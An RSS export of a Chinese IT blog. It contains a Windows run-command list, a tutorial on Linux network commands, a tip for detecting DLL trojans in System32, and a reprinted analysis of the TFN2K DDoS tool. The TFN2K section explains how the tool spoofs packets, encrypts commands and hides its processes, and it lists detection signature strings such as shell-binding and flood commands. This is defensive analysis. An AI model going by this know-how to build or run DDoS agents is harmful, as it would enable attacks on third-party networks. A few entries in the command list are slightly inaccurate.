diskmgmt.msc---磁盘管理实用程序<br>calc-----------启动计算器&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dfrg.msc-------磁盘碎片整理程序<br>chkdsk.exe-----Chkdsk磁盘检查&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; devmgmt.msc--- 设备管理器<br>regsvr32 /u *.dll----停止dll文件运行&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; drwtsn32------ 系统医生<br>rononce -p ----15秒关机&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dxdiag---------检查DirectX信息<br>regedt32-------注册表编辑器&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Msconfig.exe---系统配置实用程序<br>rsop.msc-------组策略结果集&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mem.exe--------显示内存使用情况<br>regedit.exe----注册表&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; winchat--------XP自带局域网聊天<br>progman--------程序管理器&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; winmsd---------系统信息<br>perfmon.msc----计算机性能监测程序&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; winver---------检查Windows版本 <br>sfc /scannow-----扫描错误并复原<br>taskmgr-----任务管理器（2000／xp／2003<br>winver---------检查Windows版本 <br>wmimgmt.msc----打开windows管理体系结构(WMI) <br>wupdmgr--------windows更新程序 <br>wscript--------windows脚本宿主设置 <br>write----------写字板 <br>winmsd---------系统信息 <br>wiaacmgr-------扫描仪和照相机向导 <br>winchat--------XP自带局域网聊天<br>mem.exe--------显示内存使用情况 <br>Msconfig.exe---系统配置实用程序 <br>mplayer2-------简易widnows media player <br>mspaint--------画图板 <br>mstsc----------远程桌面连接 <br>mplayer2-------媒体播放机 <br>magnify--------放大镜实用程序 <br>mmc------------打开控制台 <br>mobsync--------同步命令<br>dxdiag---------检查DirectX信息 <br>drwtsn32------ 系统医生 <br>devmgmt.msc--- 设备管理器 <br>dfrg.msc-------磁盘碎片整理程序 <br>diskmgmt.msc---磁盘管理实用程序 <br>dcomcnfg-------打开系统组件服务 <br>ddeshare-------打开DDE共享设置 <br>dvdplay--------DVD播放器<br>net stop messenger-----停止信使服务 <br>net start messenger----开始信使服务 <br>notepad--------打开记事本 <br>nslookup-------网络管理的工具向导 <br>ntbackup-------系统备份和还原 <br>narrator-------屏幕&#8220;讲述人&#8221; <br>ntmsmgr.msc----移动存储管理器 <br>ntmsoprq.msc---移动存储管理员操作请求 <br>netstat -an----(TC)命令检查接口<br>syncapp--------创建一个公文包 <br>sysedit--------系统配置编辑器 <br>sigverif-------文件签名验证程序 <br>sndrec32-------录音机 <br>shrpubw--------创建共享文件夹 <br>secpol.msc-----本地安全策略 <br>syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码 <br>services.msc---本地服务设置 <br>Sndvol32-------音量控制程序 <br>sfc.exe--------系统文件检查器 <br>sfc /scannow---windows文件保护<br>tsshutdn-------60秒倒计时关机命令 <br>tourstart------xp简介（安装完成后出现的漫游xp程序） <br>taskmgr--------任务管理器<br>eventvwr-------事件查看器 <br>eudcedit-------造字程序 <br>explorer-------打开资源管理器<br>packager-------对象包装程序 <br>perfmon.msc----计算机性能监测程序 <br>progman--------程序管理器<br>regedit.exe----注册表 <br>rsop.msc-------组策略结果集 <br>regedt32-------注册表编辑器 <br>rononce -p ----15秒关机 <br>regsvr32 /u *.dll----停止dll文件运行 <br>regsvr32 /u zipfldr.dll------取消ZIP支持<br>cmd.exe--------CMD命令提示符 <br>chkdsk.exe-----Chkdsk磁盘检查 <br>certmgr.msc----证书管理实用程序 <br>calc-----------启动计算器 <br>charmap--------启动字符映射表 <br>cliconfg-------SQL SERVER 客户端网络实用程序 <br>Clipbrd--------剪贴板查看器 <br>conf-----------启动netmeeting <br>compmgmt.msc---计算机管理 <br>cleanmgr-------垃圾整理 <br>ciadv.msc------索引服务程序<br>osk------------打开屏幕键盘 <br>odbcad32-------ODBC数据源管理器 <br>oobe/msoobe /a----检查XP是否激活 <br>lusrmgr.msc----本机用户和组 <br>logoff---------注销命令<br>iexpress-------木马捆绑工具，系统自带<br>Nslookup-------IP地址侦测器<br>fsmgmt.msc-----共享文件夹管理器<br>utilman--------辅助工具管理器<br>gpedit.msc-----组策略 </strong></p>
<p><strong></strong>&nbsp;</p>
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/61397.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2009-09-14 14:20 <a href="http://www.cnitblog.com/chenxin9821/articles/61397.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>教你使用netstat命令 </title><link>http://www.cnitblog.com/chenxin9821/articles/61398.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Mon, 14 Sep 2009 06:20:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/61398.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/61398.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/61398.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/61398.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/61398.html</trackback:ping><description><![CDATA[<p>教你使用netstat命令 </p>
<p>netstat命令的功能是显示网络连接、路由表和网络接口信息，可以让用户得知目前都有哪些网络连接正在运作。 <br>该命令的一般格式为： </p>
<p>netstat [选项]</p>
<p>命令中各选项的含义如下：</p>
<p>-a 显示所有socket，包括正在监听的。</p>
<p>-c 每隔1秒就重新显示一遍，直到用户中断它。</p>
<p>-i 显示所有网络接口的信息，格式同&#8220;ipconfig -e&#8221;。</p>
<p>-n 以网络IP地址代替名称，显示出网络连接情形。</p>
<p>-r 显示核心路由表，格式同&#8220;route -e&#8221;。</p>
<p>-t 显示TCP协议的连接情况。</p>
<p>-u 显示UDP协议的连接情况。</p>
<p>-v 显示正在进行的工作。</p>
<p>[例]在本地机上使用netstat命令。</p>
<p>$ netstat</p>
<p>Active Internet connections （w/o servers）</p>
<p>Proto Recv-Q Send-Q Local Address Foreign Address State </p>
<p>Active UNIX domain sockets （w/o servers）</p>
<p>Proto RefCnt Flags Type State I-Node Path</p>
<p>unix 1 [ ] STREAM CONNECTED 270 @00000008</p>
<p>unix 1 [ ] STREAM CONNECTED 150 @00000002</p>
<p>unix 1 [ ] STREAM CONNECTED 104 @00000001</p>
<p>unix 1 [ ] STREAM CONNECTED 222 @00000004</p>
<p>unix 1 [ ] STREAM CONNECTED 171 @00000003</p>
<p>unix 1 [ ] STREAM CONNECTED 271 /dev/log</p>
<p>unix 1 [ ] STREAM CONNECTED 225 /dev/log</p>
<p>unix 1 [ ] STREAM CONNECTED 223 /dev/log</p>
<p>unix 1 [ ] STREAM CONNECTED 203 /dev/log</p>
<p>unix 1 [ ] STREAM CONNECTED 105 /dev/log</p>
<p>&#8230;&#8230;</p>
<p>nslookup命令</p>
<p>nslookup命令的功能是查询一台机器的IP地址和其对应的域名。它通常需要一台域名服务器来提供域名服务。如果用户已经设置好域名服务器，就可以用这个命令查看不同主机的IP地址对应的域名。</p>
<p>该命令的一般格式为：</p>
<p>nslookup [IP地址/域名]</p>
<p>[例]在本地机上使用nslookup命令。</p>
<p>$ nslookup</p>
<p>Default Server: name.tlc.com.cn</p>
<p>Address: 192.168.1.99</p>
<p>&gt; </p>
<p>在符号&#8220;&gt;&#8221;后面输入要查询的IP地址或域名并回车即可。如果要退出该命令，输入exit并回车即可。</p>
<p>finger命令</p>
<p>finger命令的功能是查询用户的信息，通常会显示系统中某个用户的用户名、主目录、停滞时间、登录时间、登录shell等信息。如果要查询远程机上的用户信息，需要在用户名后面接&#8220;@主机名&#8221;，采用[用户名@主机名]的格式，不过要查询的网络主机需要运行finger守护进程。</p>
<p>该命令的一般格式为：</p>
<p>finger [选项] [使用者] [用户@主机]</p>
<p>命令中各选项的含义如下：</p>
<p>-s 显示用户的注册名、实际姓名、终端名称、写状态、停滞时间、登录时间等信息。 -l 除了用-s选项显示的信息外，还显示用户主目录、登录shell、邮件状态等信息，以及用户主目录下的.plan、.project和.forward文件的内容。</p>
<p>-p 除了不显示.plan文件和.project文件以外，与-l选项相同。</p>
<p>　</p>
<p>[例]在本地机上使用finger命令。</p>
<p>$ finger xxq</p>
<p>Login: xxq Name: </p>
<p>Directory: /home/xxq Shell: /bin/bash</p>
<p>Last login Thu Jan 1 21:43 （CST） on tty1</p>
<p>No mail.</p>
<p>No Plan.</p>
<p>　</p>
<p>$ finger</p>
<p>Login Name Tty Idle Login Time Office Office Phone</p>
<p>root root *1 28 Nov 25 09:17</p>
<p>&#8230;&#8230;</p>
<p>ping命令</p>
<p>ping命令用于查看网络上的主机是否在工作，它向该主机发送ICMP ECHO_REQUEST包。有时我们想从网络上的某台主机上下载文件，可是又不知道那台主机是否开着，就需要使用ping命令查看。</p>
<p>该命令的一般格式为：</p>
<p>ping [选项] 主机名/IP地址</p>
<p>命令中各选项的含义如下：</p>
<p>-c 数目 在发送指定数目的包后停止。</p>
<p>-d 设定SO_DEBUG的选项。</p>
<p>-f 大量且快速地送网络封包给一台机器，看它的回应。</p>
<p>-I 秒数 设定间隔几秒送一个网络封包给一台机器，预设值是一秒送一次。</p>
<p>-l 次数 在指定次数内，以最快的方式送封包数据到指定机器（只有超级用户可以使用此选项）。</p>
<p>-q 不显示任何传送封包的信息，只显示最后的结果。</p>
<p>-r 不经由网关而直接送封包到一台机器，通常是查看本机的网络接口是否有问题。</p>
<p>-s 字节数 指定发送的数据字节数，预设值是56，加上8字节的ICMP头，一共是64ICMP数据字节。</p>
<p><br>TurboLinux系统提供了大量命令和许多实用工具软件，本书由于篇幅的关系，主要介绍了TurboLinux的一些常用命令和实用软件。读者可以使用系统提供的联机帮助手册获取更多的信息。</p>
<p>TurboLinux系统的联机手册中有大量的可用信息，根据其内容分成若干节。在Linux联机帮助手册上，几乎每个命令都有说明。因此，当用户对于Linux上的一个命令不会用或是不太了解时，就请使用联机帮助命令。</p>
<p>本章主要介绍几个常用的联机帮助命令。包括：</p>
<p>man 查询每个命令的使用方法</p>
<p>help 查询Shell命令</p>
<p>whereis 查询某个命令的位置</p>
<p>locate 查询某个文件的位置</p>
<p>man命令</p>
<p>这个命令应该是每个Linux系统上都有的。它格式化并显示在线的手册页。通常使用者只要在命令man后，输入想要获取的命令的名称（例如 ls），man就会列出一份完整的说明，其内容包括命令语法、各选项的意义以及相关命令等。</p>
<p>该命令的一般形式为：</p>
<p>man [选项] 命令名称</p>
<p>命令中各选项的含义分别为：</p>
<p>-M 路径 指定搜索man手册页的路径，通常这个路径由环境变量MANPATH预设，如果在命令行上指定另外的路径，则覆盖MANPATH的设定。</p>
<p>-P 命令 指定所使用的分页程序，缺省使用/usr/bin/less&#8211;is，在环境变量MANPAGER中预设。</p>
<p>-S 章节 由于一个命令名称可能会有很多类别，至于类别，列出如下：</p>
<p>　</p>
<p>章节 说明</p>
<p>1 一般使用者的命令</p>
<p>2 系统调用的命令</p>
<p>3 C语言函数库的命令</p>
<p>4 有关驱动程序和系统设备的解释</p>
<p>5 配置文件的解释</p>
<p>6 游戏程序的命令</p>
<p>7 其他的软件或是程序的命令</p>
<p><br>有关系统维护的命令 </p>
<p>　</p>
<p>-a 显示所有的手册页，而不是只显示第一个。</p>
<p>-d 这个选项主要在检查时使用，如果用户加入了一个新的文件，就可以用这个选项检查是否出错，这个选项并不会列出文件内容。</p>
<p>-f 只显示出命令的功能而不显示其中详细的说明文件。</p>
<p>-p string 设定运行的预先处理程序的顺序，共有下列几项：</p>
<p>e eqn t tbl</p>
<p>g grap r refer</p>
<p>p pic v vgrind</p>
<p>-w 不显示手册页，只显示将被格式化和显示的文件所在位置。</p>
<p>例如：查看cd命令的使用方法。</p>
<p>$ man cd</p>
<p>cd（n） Tcl Built-In Commands cd（n）</p>
<p>_________________________________________________________________</p>
<p>NAME</p>
<p>cd - Change working directory</p>
<p>SYNOPSIS</p>
<p>cd ?dirName?</p>
<p>_________________________________________________________________</p>
<p>DEs criptION</p>
<p>Change the current working directory to dirName, or to the</p>
<p>home directory （as specified in the HOME environment vari-</p>
<p>able） if dirName is not given. Returns an empty string.</p>
<p>KEYWORDS</p>
<p>working directory</p>
<p>Tcl 1</p>
<p>（END）</p>
<p>可以按q键退出man命令。</p>
<p>help命令</p>
<p>help命令用于查看所有Shell命令。用户可以通过该命令寻求Shell命令的用法，只需在所查找的命令后输入help命令，就可以看到所查命令的内容了。</p>
<p>　</p>
<p>例如：查看od命令的使用方法。</p>
<p>$ od --help</p>
<p>　whereis命令</p>
<p>这个程序的主要功能是寻找一个命令所在的位置。例如，我们最常用的ls命令，它是在/bin这个目录下的。如果希望知道某个命令存在哪一个目录下，可以用whereis命令来查询。</p>
<p>该命令的一般形式为：</p>
<p>whereis [选项] 命令名</p>
<p>说明：一般直接使用不加选项的whereis命令，但用户也可根据特殊需要选用它的一些选项。</p>
<p>该命令中各选项的含义分别为：</p>
<p>b 只查找二进制文件</p>
<p>m 查找主要文件</p>
<p>s 查找来源</p>
<p>u 查找不常用的记录文件</p>
<p>例如：查找ls命令在什么目录下。</p>
<p>$ whereis ls</p>
<p>ls:/bin/ls/usr/man/man1/ls.1 </p>
<p>&nbsp;</p>
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/61398.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2009-09-14 14:20 <a href="http://www.cnitblog.com/chenxin9821/articles/61398.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>已经用别的用户名登录这台服务器之后...</title><link>http://www.cnitblog.com/chenxin9821/articles/46213.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Wed, 02 Jul 2008 01:39:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/46213.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/46213.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/46213.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/46213.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/46213.html</trackback:ping><description><![CDATA[以今天的名义 11:40:08<br>刚才没仔细看提示，你已经用别的用户名登录这台服务器了，进入cmd，输入net use /del *
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/46213.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2008-07-02 09:39 <a href="http://www.cnitblog.com/chenxin9821/articles/46213.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>如何检查System32下的.exe和.dll木马</title><link>http://www.cnitblog.com/chenxin9821/articles/46212.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Wed, 02 Jul 2008 01:29:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/46212.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/46212.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/46212.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/46212.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/46212.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在WinNT系统，DLL木马一般都藏在System32目录下(因为System32是系统文件存放的目录，里面的文件很多，在里面隐藏当然很方便了)，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一次记录:点击开始—运行—输入cmd回车—出现DOS命令行模式—输入cd\回车，再输入cd C:\Windows\System32回车，这就转换目录到了System32目录(要还是不知道怎么进入的，请参看DOS的cd命令的使用)，输入命令:dir *.exe&gt;exebackup.txt &amp; dir *.dll&gt;dllbackup.txt回车。 <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这样，我们就把System32目录下所有的exe文件和所有的dll文件都记录在exebackup.txt和dllbackup.txt里面了。日后如发现系统异常而用传统的方法又查不出问题时，则要考虑是不是系统中已经潜入了DLL木马。 <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这时我们用同样的方法将System32目录下的EXE和DLL文件记录到另外exebackup1.txt和dllbackup1.txt中，然后运行 CMD—fc exebackup.txt exebackup1.txt&gt;different.txt &amp; fc dllbackup.txt dllbackup1.txt&gt;different.txt(使用FC命令比较前后两次的DLL和EXE文件，并将结果输入到 different.txt中)，这样我们就能发现一些多出来的DLL和EXE文件，然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。 <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 没有是最好，如果有的话也不要直接删除掉，可以先把它移到回收站里，若系统没有异常反应再将之彻底删除，或者把DLL文件上报给反病毒研究中心检查。 
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/46212.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2008-07-02 09:29 <a href="http://www.cnitblog.com/chenxin9821/articles/46212.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>DDoS攻击工具——TFN2K 分析[转载]</title><link>http://www.cnitblog.com/chenxin9821/articles/45844.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Wed, 18 Jun 2008 05:18:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/45844.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/45844.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/45844.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/45844.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/45844.html</trackback:ping><description><![CDATA[本文是对分布式拒绝服务（DDoS）攻击工具"Tribe Flood Network 2000 (TFN2K)"的技术分析。TFN2K是由德国著名黑客Mixter编写的同类攻击工具TFN的后续版本。<br>
<p><font face="Times New Roman" size=3>&nbsp;&nbsp;&nbsp; 关于Trinoo、TFN和Stacheldraht等分布式拒绝服务攻击工具的分析请参阅相关文档。</font></p>
<br>
<p><font face="Times New Roman" size=3>术 语</font></p>
<br>
<p><font face="Times New Roman" size=3>--------</font></p>
<br>
<p><font face="Times New Roman" size=3>客户端——用于通过发动攻击的应用程序，攻击者通过它来发送各种命令。</font></p>
<br>
<p><font face="Times New Roman" size=3>守护程序——在代理端主机运行的进程，接收和响应来自客户端的命令。</font></p>
<br>
<p><font face="Times New Roman" size=3>主控端——运行客户端程序的主机。</font></p>
<br>
<p><font face="Times New Roman" size=3>代理端——运行守护程序的主机。</font></p>
<br>
<p><font face="Times New Roman" size=3>目标主机——分布式攻击的目标（主机或网络）。</font></p>
<br>
<p><font face="Times New Roman" size=3>什么是TFN2K？</font></p>
<br>
<p><font face="Times New Roman" size=3>------------</font></p>
<br>
<p><font face="Times New Roman" size=3>&nbsp;&nbsp;&nbsp; TFN2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击。当前互联网中的UNIX、Solaris和Windows NT等平台的主机能被用于此类攻击，而且这个工具非常容易被移植到其它系统平台上。</font></p>
<br>
<p><font face="Times New Roman" size=3>&nbsp;&nbsp;&nbsp; TFN2K由两部分组成：在主控端主机上的客户端和在代理端主机上的守护进程。主控端向其代理端发送攻击指定的目标主机列表。代理端据此对目标进行拒绝服务攻击。由一个主控端控制的多个代理端主机，能够在攻击过程中相互协同，保证攻击的连续性。主控央和代理端的网络通讯是经过加密的，还可能混杂了许多虚假数据包。整个TFN2K网络可能使用不同的TCP、UDP或ICMP包进行通讯。而且主控端还能伪造其IP地址。所有这些特性都使发展防御TFN2K攻击的策略和技术都非常困难或效率低下。</font></p>
<br>
<p><font face="Times New Roman" size=3>TFN2K的技术内幕</font></p>
<br>
<p><font face="Times New Roman" size=3>---------------</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 主控端通过TCP、UDP、ICMP或随机性使用其中之一的数据包向代理端主机</font></p>
<br>
<p><font face="Times New Roman" size=3>发送命令。对目标的攻击方法包括TCP/SYN、UDP、ICMP/PING或BROADCAST </font></p>
<br>
<p><font face="Times New Roman" size=3>PING (SMURF)数据包flood等。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 主控端与代理端之间数据包的头信息也是随机的，除了ICMP总是使用</font></p>
<br>
<p><font face="Times New Roman" size=3>ICMP_ECHOREPLY类型数据包。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 与其上一代版本TFN不同，TFN2K的守护程序是完全沉默的，它不会对接收</font></p>
<br>
<p><font face="Times New Roman" size=3>到的命令有任何回应。客户端重复发送每一个命令20次，并且认为守护程</font></p>
<br>
<p><font face="Times New Roman" size=3>序应该至少能接收到其中一个。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 这些命令数据包可能混杂了许多发送到随机IP地址的伪造数据包。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ TFN2K命令不是基于字符串的，而采用了"++"格式，其中是</font></p>
<br>
<p><font face="Times New Roman" size=3>代表某个特定命令的数值，则是该命令的参数。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 所有命令都经过了CAST-256算法（RFC 2612）加密。加密关键字在程序编</font></p>
<br>
<p><font face="Times New Roman" size=3>译时定义，并作为TFN2K客户端程序的口令。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 所有加密数据在发送前都被编码（Base 64）成可打印的ASCII字符。TFN2K</font></p>
<br>
<p><font face="Times New Roman" size=3>守护程序接收数据包并解密数据。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 守护进程为每一个攻击产生子进程。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ TFN2K守护进程试图通过修改argv[0]内容（或在某些平台中修改进程名）</font></p>
<br>
<p><font face="Times New Roman" size=3>以掩饰自己。伪造的进程名在编译时指定，因此每次安装时都有可能不同。</font></p>
<br>
<p><font face="Times New Roman" size=3>这个功能使TFN2K伪装成代理端主机的普通正常进程。因此，只是简单地检</font></p>
<br>
<p><font face="Times New Roman" size=3>查进程列表未必能找到TFN2K守护进程（及其子进程）。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 来自每一个客户端或守护进程的所有数据包都可能被伪造。</font></p>
<br>
<p><font face="Times New Roman" size=3>监测TFN2K的特征</font></p>
<br>
<p><font face="Times New Roman" size=3>---------------</font></p>
<br>
<p><font face="Times New Roman" size=3>&nbsp;&nbsp;&nbsp; 由于所有的控制通讯都是单向的，这使得实时监测TFN2K额外困难。因为其随机性地使用TCP、UDP和ICMP数据包，同时进行了加密，数据包过滤和其它被动式防御策略都显得不切实际和效率低下的。伪造的数据包更会增加追踪参与拒绝服务攻击的代理端主机的难度。</font></p>
<br>
<p><font face="Times New Roman" size=3>&nbsp;&nbsp;&nbsp; 幸运的是，TFN2K仍然有弱点。可能是疏忽的原因，加密后的Base 64编码在每一个TFN2K数据包的尾部留下了痕迹（与协议和加密算法无关）。可能是程序作者为了使每一个数据包的长度变化而填充了1到16个零(0x00)，经过Base 64编码后就成为多个连续的0x41('A')。添加到数据包尾部的0x41的数量是可变的，但至少会有一个。这些位于数据包尾部的0x41('A')就成了捕获TFN2K命令数据包的特征了。</font></p>
<br>
<p><font face="Times New Roman" size=3>&nbsp;&nbsp;&nbsp; 对TFN2K客户端程序（tfn）和守护程序文件（td）的简单搜索也可能会找到TFN2K。虽然这些文件名可以随意修改，但客户端程序和守护程序包含许多特征字符串，可以作为搜索的关键字。如下：</font></p>
<br>
<p><font face="Times New Roman" size=3>TFN2K客户端程序（tfn）</font></p>
<br>
<p><font face="Times New Roman" size=3>[1;34musage: %s </font></p>
<br>
<p><font face="Times New Roman" size=3>[-P protocol]</font></p>
<br>
<p><font face="Times New Roman" size=3>[-S host/ip]</font></p>
<br>
<p><font face="Times New Roman" size=3>[-f hostlist]</font></p>
<br>
<p><font face="Times New Roman" size=3>[-h hostname]</font></p>
<br>
<p><font face="Times New Roman" size=3>[-i target string]</font></p>
<br>
<p><font face="Times New Roman" size=3>[-p port]</font></p>
<br>
<p><font face="Times New Roman" size=3>&lt;-c command ID&gt;</font></p>
<br>
<p><font face="Times New Roman" size=3>change spoof level to %d</font></p>
<br>
<p><font face="Times New Roman" size=3>change packet size to %d bytes</font></p>
<br>
<p><font face="Times New Roman" size=3>bind shell(s) to port %d</font></p>
<br>
<p><font face="Times New Roman" size=3>commence udp flood</font></p>
<br>
<p><font face="Times New Roman" size=3>commence syn flood, port: %s</font></p>
<br>
<p><font face="Times New Roman" size=3>commence icmp echo flood</font></p>
<br>
<p><font face="Times New Roman" size=3>commence icmp broadcast (smurf) flood</font></p>
<br>
<p><font face="Times New Roman" size=3>commence mix flood</font></p>
<br>
<p><font face="Times New Roman" size=3>commence targa3 attack</font></p>
<br>
<p><font face="Times New Roman" size=3>execute remote command</font></p>
<br>
<p><font face="Times New Roman" size=3>TFN2K守护程序（td）</font></p>
<br>
<p><font face="Times New Roman" size=3>fork</font></p>
<br>
<p><font face="Times New Roman" size=3>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</font></p>
<br>
<p><font face="Times New Roman" size=3>/dev/urandom</font></p>
<br>
<p><font face="Times New Roman" size=3>/dev/random</font></p>
<br>
<p><font face="Times New Roman" size=3>%d.%d.%d.%d</font></p>
<br>
<p><font face="Times New Roman" size=3>sh*</font></p>
<br>
<p><font face="Times New Roman" size=3>ksh*</font></p>
<br>
<p><font face="Times New Roman" size=3>command.exe**</font></p>
<br>
<p><font face="Times New Roman" size=3>cmd.exe**</font></p>
<br>
<p><font face="Times New Roman" size=3>tfn-daemon***</font></p>
<br>
<p><font face="Times New Roman" size=3>tfn-child***</font></p>
<br>
<p><font face="Times New Roman" size=3>* Unix and Solaris systems only</font></p>
<br>
<p><font face="Times New Roman" size=3>** Windows NT systems only</font></p>
<br>
<p><font face="Times New Roman" size=3>*** This text is likely to have been changed in many TFN2K installations</font></p>
<br>
<p><font face="Times New Roman" size=3>TFN2K守护程序和客户端程序（tfn和td）</font></p>
<br>
<p><font face="Times New Roman" size=3>security_through_obscurity *</font></p>
<br>
<p><font face="Times New Roman" size=3>D4 40 FB 30 0B FF A0 9F **</font></p>
<br>
<p><font face="Times New Roman" size=3>64 64 64 64 ... ***</font></p>
<br>
<p><font face="Times New Roman" size=3>* 程序编译时定义的函数名，是一个非常有用的特征字符串。</font></p>
<br>
<p><font face="Times New Roman" size=3>** CAST-256加密表格的头8个字节（按little-endian排序）。</font></p>
<br>
<p><font face="Times New Roman" size=3>*** Base 64编码算法使用的静态表格中连续128字节长度的0x64值。</font></p>
<br>
<p><font face="Times New Roman" size=3>TFN2K的防御策略</font></p>
<br>
<p><font face="Times New Roman" size=3>---------------</font></p>
<br>
